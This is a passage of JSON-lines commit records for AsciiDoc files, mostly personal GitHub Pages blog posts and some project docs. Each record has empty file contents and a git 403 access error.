\/elasticsearch,adrianbk\/elasticsearch,koxa29\/elasticsearch,janmejay\/elasticsearch,linglaiyao1314\/elasticsearch,Chhunlong\/elasticsearch,masterweb121\/elasticsearch,yongminxia\/elasticsearch,xpandan\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,humandb\/elasticsearch,ESamir\/elasticsearch,mikemccand\/elasticsearch,mjhennig\/elasticsearch,kcompher\/elasticsearch,zeroctu\/elasticsearch,caengcjd\/elasticsearch,mjason3\/elasticsearch,mkis-\/elasticsearch,tsohil\/elasticsearch,karthikjaps\/elasticsearch,VukDukic\/elasticsearch,ulkas\/elasticsearch,boliza\/elasticsearch,jaynblue\/elasticsearch,pritishppai\/elasticsearch,girirajsharma\/elasticsearch,mm0\/elasticsearch,mjhennig\/elasticsearch,palecur\/elasticsearch,xingguang2013\/elasticsearch,gmarz\/elasticsearch,wangyuxue\/elasticsearch,Ansh90\/elasticsearch,rento19962\/elasticsearch,rlugojr\/elasticsearch,pritishppai\/elasticsearch,Collaborne\/elasticsearch,fekaputra\/elasticsearch,sjohnr\/elasticsearch,obourgain\/elasticsearch,tkssharma\/elasticsearch,fforbeck\/elasticsearch,PhaedrusTheGreek\/elasticsearch,vietlq\/elasticsearch,djschny\/elasticsearch,likaiwalkman\/elasticsearch,abibell\/elasticsearch,YosuaMichael\/elasticsearch,onegambler\/elasticsearch,heng4fun\/elasticsearch,truemped\/elasticsearch,jsgao0\/elasticsearch,jimhooker2002\/elasticsearch,feiqitian\/elasticsearch,ricardocerq\/elasticsearch,alexbrasetvik\/elasticsearch,vvcephei\/elasticsearch,Siddartha07\/elasticsearch,nomoa\/elasticsearch,vorce\/es-metrics,ydsakyclguozi\/elasticsearch,springning\/elasticsearch,kaneshin\/elasticsearch,TonyChai24\/ESSource,nrkkalyan\/elasticsearch,kimimj\/elasticsearch,sc0ttkclark\/elasticsearch,combinatorist\/elasticsearch,fooljohnny\/elasticsearch,anti-social\/elasticsearch,sscarduzio\/elasticsearch,adrianbk\/elasticsearch,nrkkalyan\/elasticsearch,amaliujia\/elasticsea
rch,koxa29\/elasticsearch,PhaedrusTheGreek\/elasticsearch,jw0201\/elastic,iamjakob\/elasticsearch,himanshuag\/elasticsearch,masterweb121\/elasticsearch,kunallimaye\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,xuzha\/elasticsearch,humandb\/elasticsearch,amit-shar\/elasticsearch,winstonewert\/elasticsearch,aparo\/elasticsearch,overcome\/elasticsearch,onegambler\/elasticsearch,jaynblue\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,wimvds\/elasticsearch,robin13\/elasticsearch,abhijitiitr\/es,markllama\/elasticsearch,yongminxia\/elasticsearch,amaliujia\/elasticsearch,yynil\/elasticsearch,MjAbuz\/elasticsearch,zeroctu\/elasticsearch,kalimatas\/elasticsearch,apepper\/elasticsearch,kalburgimanjunath\/elasticsearch,nilabhsagar\/elasticsearch,wittyameta\/elasticsearch,cwurm\/elasticsearch,diendt\/elasticsearch,ouyangkongtong\/elasticsearch,geidies\/elasticsearch,wangtuo\/elasticsearch,ouyangkongtong\/elasticsearch,truemped\/elasticsearch,vroyer\/elassandra,zkidkid\/elasticsearch,diendt\/elasticsearch,scottsom\/elasticsearch,franklanganke\/elasticsearch,franklanganke\/elasticsearch,ouyangkongtong\/elasticsearch,jbertouch\/elasticsearch,smflorentino\/elasticsearch,rento19962\/elasticsearch,TonyChai24\/ESSource,gingerwizard\/elasticsearch,Microsoft\/elasticsearch,smflorentino\/elasticsearch,strapdata\/elassandra-test,palecur\/elasticsearch,hirdesh2008\/elasticsearch,jimhooker2002\/elasticsearch,lzo\/elasticsearch-1,Uiho\/elasticsearch,mjason3\/elasticsearch,sposam\/elasticsearch,feiqitian\/elasticsearch,petabytedata\/elasticsearch,Brijeshrpatel9\/elasticsearch,alexshadow007\/elasticsearch,apepper\/elasticsearch,wangtuo\/elasticsearch,petmit\/elasticsearch,wbowling\/elasticsearch,sarwarbhuiyan\/elasticsearch,xingguang2013\/elasticsearch,Siddartha07\/elasticsearch,kunallimaye\/elasticsearch,Asimov4\/elasticsearch,jimczi\/elasticsearch,beiske\/elasticsearch,weipinghe\/elasticsearch,bawse\/elasticsearch,zhaocloud\/elasticsearch,qwerty4030\/elasticsearch,nellicus\/elasticsearch,golubev\/elasticsearch,lmtwga\/elasticsearch,masaruh\/elasticsearch,salyh\/elasticsearch,yuy168\/elasticsearch,dylan8902\/elasticsearch,elancom\/elasticsearch,codebunt\/elasticsearch,Brijeshrpatel9\/elasticsearch,MichaelLiZhou\/elasticsearch,fubuki\/elasticsearch,mjhennig\/elasticsearch,areek\/elasticsearch,StefanGor\/elasticsearch,gingerwizard\/elasticsearch,xuzha\/elasticsearch,Shekharrajak\/elasticsearch,kalimatas\/elasticsearch,alexshadow007\/elasticsearch,ivansun1010\/elasticsearch,rhoml\/elasticsearch,rlugojr\/elasticsearch,vingupta3\/elasticsearch,brandonkearby\/elasticsearch,elasticdog\/elasticsearch,mnylen\/elasticsearch,luiseduardohdbackup\/elasticsearch,andrestc\/elasticsearch,jeteve\/elasticsearch,winstonewert\/elasticsearch,rmuir\/elasticsearch,Stacey-Gammon\/elasticsearch,Charlesdong\/elasticsearch,yanjunh\/elasticsearch,fekaputra\/elasticsearch,vietlq\/elasticsearch,jimhooker2002\/elasticsearch,zhiqinghuang\/elasticsearch,IanvsPoplicola\/elasticsearch,libosu\/elasticsearch,ZTE-PaaS\/elasticsearch,combinatorist\/elasticsearch,Widen\/elasticsearch,pozhidaevak\/elasticsearch,Microsoft\/elasticsearch,hanswang\/elasticsearch,petmit\/elasticsearch,StefanGor\/elasticsearch,snikch\/elasticsearch,Shepard1212\/elasticsearch,tcucchietti\/elasticsearch,henakamaMSFT\/elasticsearch,VukDukic\/elasticsearch,anti-social\/elasticsearch,milodky\/elasticsearch,Kakakakakku\/elasticsearch,Ansh90\/elasticsearch,feiqitian\/elasticsearch,geidies\/elasticsearch,pranavraman\/elasticsearch,Fsero\/elasticsearch,mmaracic\/elasticsearc
h,liweinan0423\/elasticsearch,TonyChai24\/ESSource,shreejay\/elasticsearch,heng4fun\/elasticsearch,nrkkalyan\/elasticsearch,EasonYi\/elasticsearch,chrismwendt\/elasticsearch,chirilo\/elasticsearch,sscarduzio\/elasticsearch,vingupta3\/elasticsearch,mgalushka\/elasticsearch,marcuswr\/elasticsearch-dateline,mortonsykes\/elasticsearch,s1monw\/elasticsearch,fforbeck\/elasticsearch,ajhalani\/elasticsearch,sarwarbhuiyan\/elasticsearch,vingupta3\/elasticsearch,MaineC\/elasticsearch,iacdingping\/elasticsearch,Widen\/elasticsearch,petmit\/elasticsearch,micpalmia\/elasticsearch,wenpos\/elasticsearch,episerver\/elasticsearch,alexksikes\/elasticsearch,onegambler\/elasticsearch,mm0\/elasticsearch,qwerty4030\/elasticsearch,hafkensite\/elasticsearch,fforbeck\/elasticsearch,opendatasoft\/elasticsearch,micpalmia\/elasticsearch,luiseduardohdbackup\/elasticsearch,trangvh\/elasticsearch,kkirsche\/elasticsearch,huanzhong\/elasticsearch,tcucchietti\/elasticsearch,mikemccand\/elasticsearch,EasonYi\/elasticsearch,hafkensite\/elasticsearch,ivansun1010\/elasticsearch,iantruslove\/elasticsearch,Fsero\/elasticsearch,wbowling\/elasticsearch,masaruh\/elasticsearch,strapdata\/elassandra-test,thecocce\/elasticsearch,zkidkid\/elasticsearch,hydro2k\/elasticsearch,wangyuxue\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,Asimov4\/elasticsearch,achow\/elasticsearch,chirilo\/elasticsearch,nrkkalyan\/elasticsearch,humandb\/elasticsearch,hafkensite\/elasticsearch,gfyoung\/elasticsearch,phani546\/elasticsearch,aparo\/elasticsearch,jbertouch\/elasticsearch,andrejserafim\/elasticsearch,khiraiwa\/elasticsearch,shreejay\/elasticsearch,nellicus\/elasticsearch,qwerty4030\/elasticsearch,rajanm\/elasticsearch,dpursehouse\/elasticsearch,nezirus\/elasticsearch,jeteve\/elasticsearch,mapr\/elasticsearch,mcku\/elasticsearch,davidvgalbraith\/elasticsearch,NBSW\/elasticsearch,awislowski\/elasticsearch,fooljohnny\/elasticsearch,Shepard1212\/elasticsearch,gmarz\/elasticsearch,Kakakakakku\/elasticsearch,myelin\/elasticsearch,Liziyao\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,MisterAndersen\/elasticsearch,achow\/elasticsearch,ckclark\/elasticsearch,vvcephei\/elasticsearch,yongminxia\/elasticsearch,awislowski\/elasticsearch,Clairebi\/ElasticsearchClone,fernandozhu\/elasticsearch,YosuaMichael\/elasticsearch,Ansh90\/elasticsearch,scorpionvicky\/elasticsearch,andrejserafim\/elasticsearch,yongminxia\/elasticsearch,chrismwendt\/elasticsearch,nilabhsagar\/elasticsearch,rajanm\/elasticsearch,mbrukman\/elasticsearch,queirozfcom\/elasticsearch,SergVro\/elasticsearch,LeoYao\/elasticsearch,gingerwizard\/elasticsearch,18098924759\/elasticsearch,mbrukman\/elasticsearch,huanzhong\/elasticsearch,pritishppai\/elasticsearch,strapdata\/elassandra-test,feiqitian\/elasticsearch,fubuki\/elasticsearch,andrestc\/elasticsearch,s1monw\/elasticsearch,lmenezes\/elasticsearch,YosuaMichael\/elasticsearch,zhaocloud\/elasticsearch,khiraiwa\/elasticsearch,abibell\/elasticsearch,lydonchandra\/elasticsearch,kubum\/elasticsearch,achow\/elasticsearch,lzo\/elasticsearch-1,Helen-Zhao\/elasticsearch,rento19962\/elasticsearch,Charlesdong\/elasticsearch,humandb\/elasticsearch,yanjunh\/elasticsearch,tahaemin\/elasticsearch,nrkkalyan\/elasticsearch,kingaj\/elasticsearch,kkirsche\/elasticsearch,iantruslove\/elasticsearch,naveenhooda2000\/elasticsearch,MetSystem\/elasticsearch,loconsolutions\/elasticsearch,Uiho\/elasticsearch,nknize\/elasticsearch,nezirus\/elasticsearch,obourgain\/elasticsearch,smflorentino\/elasticsearch,socialrank\/elasticsearch,mm0\/elasticsearch,peschlo
wp\/elasticsearch,episerver\/elasticsearch,jsgao0\/elasticsearch,lydonchandra\/elasticsearch,sjohnr\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,robin13\/elasticsearch,kubum\/elasticsearch,kevinkluge\/elasticsearch,ZTE-PaaS\/elasticsearch,JSCooke\/elasticsearch,petabytedata\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,YosuaMichael\/elasticsearch,glefloch\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,Ansh90\/elasticsearch,kalburgimanjunath\/elasticsearch,lzo\/elasticsearch-1,F0lha\/elasticsearch,franklanganke\/elasticsearch,snikch\/elasticsearch,nilabhsagar\/elasticsearch,alexkuk\/elasticsearch","old_file":"docs\/reference\/indices\/templates.asciidoc","new_file":"docs\/reference\/indices\/templates.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e26a07625e510fddf9da964d63ef0963ea808289","subject":"BVAL-508 Refinement of \"open questions\" section","message":"BVAL-508 Refinement of \"open questions\" section\n","repos":"beanvalidation\/beanvalidation-spec,gunnarmorling\/beanvalidation-spec,gunnarmorling\/beanvalidation-spec,gunnarmorling\/beanvalidation-spec,beanvalidation\/beanvalidation-spec,beanvalidation\/beanvalidation-spec","old_file":"sources\/appendix-value-extraction.asciidoc","new_file":"sources\/appendix-value-extraction.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/beanvalidation\/beanvalidation-spec.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b4448aa1db7465a975ec96d4b1da4903d74e4b62","subject":"(draft)","message":"(draft)\n","repos":"alexis-hassler\/blog,alexis-hassler\/blog","old_file":"_drafts\/2017-08-23-migration.adoc","new_file":"_drafts\/2017-08-23-migration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alexis-hassler\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f0a8803b896d1de383bf6dcb8d9e84bdaa92cb1","subject":"Update 2016-01-28-Nuovo-post.adoc","message":"Update 2016-01-28-Nuovo-post.adoc","repos":"bartoleo\/bartoleo.github.io,bartoleo\/bartoleo.github.io,bartoleo\/bartoleo.github.io","old_file":"_posts\/2016-01-28-Nuovo-post.adoc","new_file":"_posts\/2016-01-28-Nuovo-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bartoleo\/bartoleo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5319fe2616f2df6c7acdfcabd0750e58b541d2bf","subject":"Update 2016-04-04-Javascript.adoc","message":"Update 2016-04-04-Javascript.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Javascript.adoc","new_file":"_posts\/2016-04-04-Javascript.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"41c6f5031d8b70ddb75917638373edaca9a8cf3b","subject":"Update 2016-12-14-PresidentA.adoc","message":"Update 
2016-12-14-PresidentA.adoc","repos":"arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io","old_file":"_posts\/2016-12-14-PresidentA.adoc","new_file":"_posts\/2016-12-14-PresidentA.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arthurmolina\/arthurmolina.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2f2f8d8fd7eb02762996568f1cb455a1cc39fc73","subject":"Update README","message":"Update README\n\nSigned-off-by: Sebastian Davids <ad054bf4072605cd37d196cd013ffd05b05c77ca@gmx.de>\n","repos":"sdavids\/sdavids-commons-uuid,sdavids\/sdavids-commons-uuid","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sdavids\/sdavids-commons-uuid.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ba5d77b383334644d36cd35c2c4345d714e9eb35","subject":"\u6dfb\u52a0\u622a\u56fe\u6b23\u8d4f","message":"\u6dfb\u52a0\u622a\u56fe\u6b23\u8d4f\n\n","repos":"yiiu-co\/yiiu,yiiu-co\/yiiu,liygheart\/jfinalbbs,yiiu-co\/yiiu,yiiu-co\/yiiu,liygheart\/jfinalbbs,liygheart\/jfinalbbs,liygheart\/jfinalbbs,liygheart\/jfinalbbs,liygheart\/jfinalbbs,liygheart\/jfinalbbs,yiiu-co\/yiiu","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/liygheart\/jfinalbbs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c547ed1a9ab908e37b9af5372dac3c7e840d3b95","subject":"Update 2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","message":"Update 2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","new_file":"_posts\/2017-04-10-ASISCTF-QUAL-2017-Crows-knows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e8c2a6f2fa94079cc0c3c2daafc8ad277727b6c","subject":"y2b create post Samsung Gear S2 Hands On + Liquid Test","message":"y2b create post Samsung Gear S2 Hands On + Liquid Test","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-09-03-Samsung-Gear-S2-Hands-On--Liquid-Test.adoc","new_file":"_posts\/2015-09-03-Samsung-Gear-S2-Hands-On--Liquid-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"219d191e3900ca8eb2cabaaa2eca39f9ec21ece2","subject":"Update 2017-03-07-Part-1-Introducing-SP-A.adoc","message":"Update 
2017-03-07-Part-1-Introducing-SP-A.adoc","repos":"txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io,txemis\/txemis.github.io","old_file":"_posts\/2017-03-07-Part-1-Introducing-SP-A.adoc","new_file":"_posts\/2017-03-07-Part-1-Introducing-SP-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/txemis\/txemis.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6698e8067e932bda220052d1d9bc08060c5b3e8","subject":"Update 2016-03-30-Las-matematicas-son-mis-amigas.adoc","message":"Update 2016-03-30-Las-matematicas-son-mis-amigas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-30-Las-matematicas-son-mis-amigas.adoc","new_file":"_posts\/2016-03-30-Las-matematicas-son-mis-amigas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e11bd9a5e03a978a420eca3e5ea64cc116700ea4","subject":"Update 2015-05-27-Apache-24-PHP5-FPM-on-Debian8.adoc","message":"Update 2015-05-27-Apache-24-PHP5-FPM-on-Debian8.adoc","repos":"sanglt\/sanglt.github.io,sanglt\/sanglt.github.io,sanglt\/sanglt.github.io","old_file":"_posts\/2015-05-27-Apache-24-PHP5-FPM-on-Debian8.adoc","new_file":"_posts\/2015-05-27-Apache-24-PHP5-FPM-on-Debian8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sanglt\/sanglt.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dcf5b29d0eff64aa274db9f9fd001048dbf65079","subject":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","message":"Update 2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_file":"_posts\/2017-06-04-Route53-S-E-S-S3-Lambda-Gmail.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"59a0f78c412488c7e470b96d4815300fbb949ec5","subject":"End course","message":"End course\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Course Object\/Planning.adoc","new_file":"Course Object\/Planning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca8e1a96c1bc9f59bf5b0c4480639750cb267857","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: 
unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"37546e40351eea8a16c5da71a4b2a2a7a4c6b92a","subject":"Update 2015-02-27-Surprise-Madafaka.adoc","message":"Update 2015-02-27-Surprise-Madafaka.adoc","repos":"natsu90\/hubpress.io,natsu90\/hubpress.io,natsu90\/hubpress.io","old_file":"_posts\/2015-02-27-Surprise-Madafaka.adoc","new_file":"_posts\/2015-02-27-Surprise-Madafaka.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/natsu90\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"40939982d3c6614481925ceb6ab023eb1328296e","subject":"Update 2017-06-13-Episode-103-Focus.adoc","message":"Update 2017-06-13-Episode-103-Focus.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2017-06-13-Episode-103-Focus.adoc","new_file":"_posts\/2017-06-13-Episode-103-Focus.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bd927467f526ecf5bb795349eeaa4b19464b1bf3","subject":"Update 2016-08-31-Android-Update-Protocol.adoc","message":"Update 2016-08-31-Android-Update-Protocol.adoc","repos":"AppHat\/AppHat.github.io,AppHat\/AppHat.github.io,AppHat\/AppHat.github.io,AppHat\/AppHat.github.io","old_file":"_posts\/2016-08-31-Android-Update-Protocol.adoc","new_file":"_posts\/2016-08-31-Android-Update-Protocol.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AppHat\/AppHat.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38fa6c55ce2c78b5c6c45a773c5298280021a28f","subject":"Delete the file at '_posts\/2018-02-25-3-Cool-Gadgets-Under-80.adoc'","message":"Delete the file at '_posts\/2018-02-25-3-Cool-Gadgets-Under-80.adoc'","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-25-3-Cool-Gadgets-Under-80.adoc","new_file":"_posts\/2018-02-25-3-Cool-Gadgets-Under-80.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5ef4ef407161ce2c5e3d5a9c86fadfe8b7402f7e","subject":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","message":"Update 2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_file":"_posts\/2016-09-09-the-reason-I-selected-Atom-of-editor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8406637fdd84ea6669cda51b4d665a53d026735c","subject":"Update 
2015-09-21-Reusing-Classes.adoc","message":"Update 2015-09-21-Reusing-Classes.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-21-Reusing-Classes.adoc","new_file":"_posts\/2015-09-21-Reusing-Classes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cddfe0e4b16098eddda61ff6045e2a91cf96cb6f","subject":"Update 2017-08-02-Killing-A-Tumor.adoc","message":"Update 2017-08-02-Killing-A-Tumor.adoc","repos":"mcornell\/OFM,mcornell\/OFM,mcornell\/OFM,mcornell\/OFM","old_file":"_posts\/2017-08-02-Killing-A-Tumor.adoc","new_file":"_posts\/2017-08-02-Killing-A-Tumor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mcornell\/OFM.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8826c075abdfc75e8eecb8ef5e17455cc99bc61b","subject":"Update 2018-02-02-.adoc","message":"Update 2018-02-02-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-02-.adoc","new_file":"_posts\/2018-02-02-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c919f0beeeead4ef682b01ad67a6d569ad9e7e28","subject":"Update 2017-04-05-FPM.adoc","message":"Update 2017-04-05-FPM.adoc","repos":"gogonkt\/makenothing,gogonkt\/makenothing,gogonkt\/makenothing,gogonkt\/makenothing","old_file":"_posts\/2017-04-05-FPM.adoc","new_file":"_posts\/2017-04-05-FPM.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gogonkt\/makenothing.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"737d07b9a950a113d8ac9dc531f334351ca8b8b1","subject":"Update 2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","message":"Update 2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_file":"_posts\/2017-04-22-Amazon-Redshift-Spectrum-C-S-V.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"234a08216ea64a2e924cb2cb376a6b0ec17ecbdb","subject":"Update 2015-04-08-Test-Posting-1.adoc","message":"Update 2015-04-08-Test-Posting-1.adoc","repos":"abien\/abien.github.io,abien\/abien.github.io,abien\/abien.github.io,abien\/abien.github.io","old_file":"_posts\/2015-04-08-Test-Posting-1.adoc","new_file":"_posts\/2015-04-08-Test-Posting-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/abien\/abien.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8dee21779959bf3cf7066d8754bfda2f33ec7070","subject":"Update 
2015-05-24-DevConfcz-2015.adoc","message":"Update 2015-05-24-DevConfcz-2015.adoc","repos":"OlgaMaciaszek\/olgamaciaszek.github.io,OlgaMaciaszek\/olgamaciaszek.github.io,OlgaMaciaszek\/olgamaciaszek.github.io","old_file":"_posts\/2015-05-24-DevConfcz-2015.adoc","new_file":"_posts\/2015-05-24-DevConfcz-2015.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/OlgaMaciaszek\/olgamaciaszek.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"71b93c966a12b0eea05b9c7b7b42b7532cd421dc","subject":"Update 2017-03-03-C-S-S-triangle.adoc","message":"Update 2017-03-03-C-S-S-triangle.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-03-C-S-S-triangle.adoc","new_file":"_posts\/2017-03-03-C-S-S-triangle.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"859864f9fd464dd79ea42ba27878b63c0a4df4f4","subject":"Update 2018-10-21-.adoc","message":"Update 2018-10-21-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-21-.adoc","new_file":"_posts\/2018-10-21-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 